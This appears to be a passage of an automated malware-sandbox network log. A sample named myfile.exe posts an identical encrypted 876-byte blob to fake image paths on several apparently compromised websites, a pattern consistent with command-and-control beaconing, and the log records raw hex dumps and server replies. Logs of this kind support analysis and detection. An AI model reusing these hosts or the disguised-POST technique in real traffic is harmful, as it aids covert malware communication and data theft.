                                                              2024-09-09 10:07:07 UTC1369INData Raw: 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63
                                                              Data Ascii: sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.c
                                                              2024-09-09 10:07:07 UTC1369INData Raw: 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79
                                                              Data Ascii: ,n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==ty
                                                              2024-09-09 10:07:07 UTC1369INData Raw: 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 73 74 72 69 70 65 2d 6d 61 69 6e 2d 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 61 73 68 61 6e 64 62 72 6f 77 65 6e 76 79 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 6d 75 2d 70 6c 75 67 69 6e 73 2f 76 65 6e 64 6f 72 2f 67 6f 64 61 64 64 79 2f 6d 77 63 2d 63 6f 72 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 73 74 72 69 70 65 2d 73 65 74 74 69 6e 67 73 2e 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20
                                                              Data Ascii: .wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='stripe-main-styles-css' href='https://lashandbrowenvy.com/wp-content/mu-plugins/vendor/godaddy/mwc-core/assets/css/stripe-settings.css' media='all' /><style
                                                              2024-09-09 10:07:07 UTC1369INData Raw: 35 64 37 65 0d 0a 66 66 66 66 66 66 61 36 7d 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 74
                                                              Data Ascii: 5d7effffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-t
                                                              2024-09-09 10:07:07 UTC1369INData Raw: 74 79 6c 65 2d 64 6f 74 73 29 7b 77 69 64 74 68 3a 31 30 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 29 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 68 65 69 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74
                                                              Data Ascii: tyle-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-t


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449739185.58.213.844437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:07 UTC276OUTPOST /wp-content/assets/iybw.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: rsidesigns.com
                                                              2024-09-09 10:07:07 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:08 UTC153INHTTP/1.1 405 Not Allowed
                                                              Date: Mon, 09 Sep 2024 10:07:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 163
                                                              Connection: close
                                                              X-Edge-Location: Mono
                                                              2024-09-09 10:07:08 UTC163INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty/1.21.4.1</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.44974089.108.65.794437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:09 UTC285OUTPOST /wp-content/assets/umjrglicgx.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: pansionatblago.ru
                                                              2024-09-09 10:07:09 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:09 UTC380INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.18.0 (Ubuntu)
                                                              Date: Mon, 09 Sep 2024 10:07:09 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/7.4.3
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              Set-Cookie: PHPSESSID=3846c15c8bd216c772f1d36ac5b4868d; path=/
                                                              2024-09-09 10:07:09 UTC16004INData Raw: 31 65 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 3c 6c 69 6e
                                                              Data Ascii: 1e9f<!DOCTYPE html><html lang="ru-RU"> ...<![endif]--><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><lin


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.449741217.160.0.184437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:10 UTC276OUTPOST /static/temp/mdjsvnauuvkc.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: magrinya.net
                                                              2024-09-09 10:07:10 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:11 UTC350INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Date: Mon, 09 Sep 2024 10:07:11 GMT
                                                              Server: Apache
                                                              X-Powered-By: PHP/8.0.30
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://magrinya.net/wp-json/>; rel="https://api.w.org/"
                                                              2024-09-09 10:07:11 UTC16034INData Raw: 33 63 0d 0a 0a 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 0a 09 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 39 22 20 0d 0a 33 63 30 0d 0a 6c 61 6e 67 3d 22 65 73 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 39 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 73 22 20 64 61 74 61 2d 66 6f 6f 74 65 72 2d 74 68 65 6d 65 3d 64 61 72 6b 20 64 61 74 61 2d 6d 65 6e 75 2d 74 68 65 6d 65 3d 64 61 72 6b 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 2d 74 68 65 6d 65 3d 64 61 72 6b 20 64 61 74 61 2d 70 61 67 65 2d 74 69 74 6c 65 2d 74 68 65 6d 65 3d 64 61 72 6b 20 69 74 65 6d 74 79 70 65 3d 22
                                                              Data Ascii: 3c<!DOCTYPE html>...[if IE 9]><html class="no-js ie9" 3c0lang="es"><![endif]-->...[if gt IE 9]>...><html class="no-js" lang="es" data-footer-theme=dark data-menu-theme=dark data-submenu-theme=dark data-page-title-theme=dark itemtype="


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.449742188.40.30.1064437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:12 UTC278OUTPOST /news/graphic/yooacevq.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: business-basic.de
                                                              2024-09-09 10:07:12 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:13 UTC294INHTTP/1.1 200 OK
                                                              Date: Mon, 09 Sep 2024 10:07:12 GMT
                                                              Server: Apache
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Retry-After: 86400
                                                              Upgrade: h2
                                                              Connection: Upgrade, close
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              2024-09-09 10:07:13 UTC2410INData Raw: 39 35 65 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 53 43 20 2f 20 56 53 20 4b 61 72 74 65 6e 73 68 6f 70 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65
                                                              Data Ascii: 95e<html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>LSC / VS Kartenshop is under construction</title


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.449743138.201.61.684437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:14 UTC292OUTPOST /uploads/assets/xwncifkynx.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: afbudsrejserallinclusive.dk
                                                              2024-09-09 10:07:14 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:14 UTC542INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              link: <https://www.afbudsrejserallinclusive.dk/wp-json/>; rel="https://api.w.org/"
                                                              transfer-encoding: chunked
                                                              date: Mon, 09 Sep 2024 10:07:14 GMT
                                                              server: LiteSpeed
                                                              vary: User-Agent
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                              2024-09-09 10:07:14 UTC6INData Raw: 38 38 62 38 0d 0a
                                                              Data Ascii: 88b8


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.44974489.116.147.1894437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:15 UTC272OUTPOST /news/pics/sovuwxryinfm.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: m2graph.fr
                                                              2024-09-09 10:07:15 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:16 UTC610INHTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              x-powered-by: PHP/7.4.33
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              x-ua-compatible: IE=edge
                                                              location: http://m2graph.fr
                                                              content-length: 223
                                                              date: Mon, 09 Sep 2024 10:07:16 GMT
                                                              server: LiteSpeed
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
